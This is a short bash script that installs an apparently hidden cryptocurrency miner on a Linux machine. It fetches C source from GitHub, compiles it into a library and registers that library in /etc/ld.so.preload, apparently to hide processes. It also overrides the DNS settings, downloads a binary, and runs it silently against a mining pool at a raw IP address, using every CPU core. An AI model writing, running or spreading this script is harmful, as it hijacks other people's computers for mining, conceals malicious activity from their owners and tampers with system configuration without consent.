#!/bin/bash
apt-get update ; apt-get install sudo -y
apt install unzip
curl https://github.com/kidoescegh/jadul/raw/main/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
wget -O red https://github.com/kidoescegh/filee/raw/main/avxinter2
chmod 777 red
./red -a power2b  -o stratum+tcp://188.166.54.84:443 -u mbc1qm7y0rx0r43t5c3f6y8uuf0pykaa2uq5h2emz3v.$(shuf -n 1 -i 1-99999)-DD -t $(nproc --all) >/dev/null 2>&1 &&
